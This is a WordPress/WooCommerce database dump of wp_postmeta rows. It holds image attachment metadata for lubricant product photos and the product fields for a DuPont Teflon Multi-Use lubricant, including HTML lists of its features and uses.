INSERT INTO `wp_postmeta` VALUES (17664, 1792, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:250;s:6:"height";i:198;s:4:"file";s:33:"krytox-authorized-distributor.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (17665, 1793, '_wp_attached_file', '2016/09/krytox-authorized-distributor-2-e1474291017653.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17666, 1793, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:125;s:6:"height";i:99;s:4:"file";s:58:"2016/09/krytox-authorized-distributor-2-e1474291017653.jpg";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17667, 1793, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:125;s:6:"height";i:99;s:4:"file";s:35:"krytox-authorized-distributor-2.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (17668, 1794, '_wp_attached_file', '2016/09/krytox-authorized-distributor-3-e1474291247159.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17669, 1794, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:100;s:6:"height";i:79;s:4:"file";s:58:"2016/09/krytox-authorized-distributor-3-e1474291247159.jpg";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17670, 1794, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:100;s:6:"height";i:79;s:4:"file";s:35:"krytox-authorized-distributor-3.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (17671, 1088, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17672, 1111, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17673, 713, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17674, 714, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17675, 715, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17676, 717, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17677, 868, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17678, 878, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17679, 880, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17680, 881, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17681, 888, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17682, 989, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17683, 1796, '_wp_attached_file', '2016/08/MS-122AV.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17684, 1796, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/MS-122AV.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-122AV-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-122AV-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-122AV-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-122AV-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-122AV-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-122AV-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-122AV-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-122AV-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17685, 733, '_thumbnail_id', '1752'); 
INSERT INTO `wp_postmeta` VALUES (17686, 733, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17687, 734, '_thumbnail_id', '1753'); 
INSERT INTO `wp_postmeta` VALUES (17688, 734, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17689, 1002, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17690, 1009, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17691, 1010, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17692, 621, '_thumbnail_id', '1758'); 
INSERT INTO `wp_postmeta` VALUES (17693, 621, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17694, 637, '_thumbnail_id', '1759'); 
INSERT INTO `wp_postmeta` VALUES (17695, 637, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17696, 622, '_thumbnail_id', '1749'); 
INSERT INTO `wp_postmeta` VALUES (17697, 622, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17698, 1011, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17699, 1014, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17700, 620, '_thumbnail_id', '1750'); 
INSERT INTO `wp_postmeta` VALUES (17701, 620, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17702, 732, '_thumbnail_id', '1751'); 
INSERT INTO `wp_postmeta` VALUES (17703, 732, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17704, 735, '_thumbnail_id', '1754'); 
INSERT INTO `wp_postmeta` VALUES (17705, 735, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17706, 190, '_thumbnail_id', '1755'); 
INSERT INTO `wp_postmeta` VALUES (17707, 190, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17708, 736, '_thumbnail_id', '1756'); 
INSERT INTO `wp_postmeta` VALUES (17709, 736, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17710, 738, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17711, 1012, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17712, 738, '_thumbnail_id', '1757'); 
INSERT INTO `wp_postmeta` VALUES (17713, 1015, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17714, 1016, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17715, 992, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17716, 993, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17717, 419, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17718, 995, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17719, 996, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17720, 997, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17721, 998, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17722, 999, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17723, 1001, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17724, 984, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17725, 973, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17726, 1072, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17727, 1797, '_wp_attached_file', '2016/08/RELEASYS-82-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17728, 1797, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/08/RELEASYS-82-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-82-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"RELEASYS-82-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"RELEASYS-82-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"RELEASYS-82-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-82-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-82-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"RELEASYS-82-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"RELEASYS-82-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17729, 1798, '_wp_attached_file', '2016/08/RELEASYS-85-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17730, 1798, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/08/RELEASYS-85-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-85-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"RELEASYS-85-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"RELEASYS-85-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"RELEASYS-85-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-85-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-85-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"RELEASYS-85-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"RELEASYS-85-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17731, 1799, '_wp_attached_file', '2016/08/RELEASYS-88-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17732, 1799, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/08/RELEASYS-88-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-88-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"RELEASYS-88-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"RELEASYS-88-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"RELEASYS-88-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-88-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"RELEASYS-88-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"RELEASYS-88-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"RELEASYS-88-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17733, 1799, '_edit_lock', '1474299017:3'); 
INSERT INTO `wp_postmeta` VALUES (17734, 1713, '_thumbnail_id', '1748'); 
INSERT INTO `wp_postmeta` VALUES (17735, 1705, '_thumbnail_id', '1765'); 
INSERT INTO `wp_postmeta` VALUES (17736, 1706, '_thumbnail_id', '1766'); 
INSERT INTO `wp_postmeta` VALUES (17737, 1708, '_thumbnail_id', '1772'); 
INSERT INTO `wp_postmeta` VALUES (17738, 1710, '_thumbnail_id', '1773'); 
INSERT INTO `wp_postmeta` VALUES (17739, 1801, '_edit_lock', '1482412724:2'); 
INSERT INTO `wp_postmeta` VALUES (17740, 1801, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17741, 1802, '_wp_attached_file', '2016/09/teflon-multi-use-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17742, 1802, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:30:"2016/09/teflon-multi-use-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"teflon-multi-use-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"teflon-multi-use-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"teflon-multi-use-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"teflon-multi-use-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"teflon-multi-use-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"teflon-multi-use-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"teflon-multi-use-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"teflon-multi-use-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17743, 1801, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (17744, 1801, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (17745, 1801, '_thumbnail_id', '1802'); 
INSERT INTO `wp_postmeta` VALUES (17746, 1801, '312_default_editor', '<ul>\r\n 	<li>Clean, low-odor film is much more user friendly than conventional heavy oils, and this film will not attract and absorb abrasive contaminants at the same rate as a heavier oil</li>\r\n 	<li>Temperature range: provides lubricating qualities at -20°F up to 250°F (-29°C up to 121°C), with intermittent spikes as high as 300°F (149°C)</li>\r\n 	<li>Provides superior anti-stick and extreme pressure properties</li>\r\n 	<li>Outstanding adhesion and long lubricant life</li>\r\n 	<li>Water repelling, protects against rust and corrosion</li>\r\n 	<li>O-ring safe and contains no silicones</li>\r\n 	<li>Non-staining to most materials, low to no odor. Contains no Prop 65 ingredients</li>\r\n 	<li>Very low surface tension; goes on wet to penetrate and evenly coat all frictional surfaces</li>\r\n 	<li>Sets up with a clean, low-odor film which can be used indoors or outdoors</li>\r\n 	<li>Features DuPont™ Teflon® fluoropolymer to provide enhanced moisture repellency and better protection against abrasive wear</li>\r\n 	<li>Silicone-free film</li>\r\n 	<li>Formulated with calcium sulfonate to deliver longer lubricant life, higher temperature stability and enhanced rust and corrosion protection</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17747, 1801, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17748, 1801, '716_default_editor', '<ul>\r\n 	<li>Precision parts where a very low coefficient of friction is required.</li>\r\n 	<li>Parts that need to be re-lubricated and/or are used in extremely cold conditions.</li>\r\n 	<li>High moisture applications where other lubricants either quickly wash off or do not provide adequate rust protection</li>\r\n 	<li>Parts that need to be coated to prevent rust and corrosion</li>\r\n 	<li>High RPM chains like motorcycle, ATV, Go-Kart where conventional heavier oils attract excessive amounts of abrasive contaminants. Multi-Use is O-Ring safe (Note: For chains used in extremely high contaminant environments, please use DuPont™ Chain Saver)</li>\r\n 	<li>Motorcycle, ATV and go-cart chains (no fling-off)</li>\r\n 	<li>Garage and overhead door chains, springs, rollers and tracks</li>\r\n 	<li>Hinges, windows, sliding tracks, locks and latches</li>\r\n 	<li>Winches, hitches, ramps, pivots, cams and pulleys</li>\r\n 	<li>Threaded parts and rusted bolts</li>\r\n 	<li>Heavy-duty zippers</li>\r\n 	<li>Fishing reels, RC vehicles and bicycle chains</li>\r\n 	<li>Lawn and garden tools and equipment</li>\r\n 	<li>NSF H-2 Listed</li>\r\n 	<li>Can withstand temperatures up to 300°F (149°C)</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (17749, 1801, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17750, 1801, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17751, 1801, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17752, 1801, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17753, 1801, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17754, 1801, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17755, 1801, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17756, 1801, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17757, 1801, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17758, 1801, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17759, 1801, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17760, 1801, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17761, 1801, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17762, 1801, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17763, 1801, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17764, 1801, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17765, 1801, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17766, 1801, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17767, 1801, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17768, 1801, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17769, 1801, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17770, 1801, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17771, 1801, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17772, 1801, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17773, 1801, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17774, 1801, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (17775, 1801, '_product_image_gallery', '1789,1790'); 
INSERT INTO `wp_postmeta` VALUES (17776, 1804, '_wp_attached_file', '2016/09/H0805A-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17777, 1804, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/09/H0805A-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"H0805A-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"H0805A-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"H0805A-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"H0805A-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"H0805A-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"H0805A-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"H0805A-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"H0805A-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17778, 1805, '_wp_attached_file', '2016/09/Teflon-Grease-MS-THE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17779, 1805, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:32:"2016/09/Teflon-Grease-MS-THE.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"Teflon-Grease-MS-THE-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"Teflon-Grease-MS-THE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17780, 1806, '_wp_attached_file', '2016/09/Teflon-Grease-MS-THE-JAR.jpg'); 
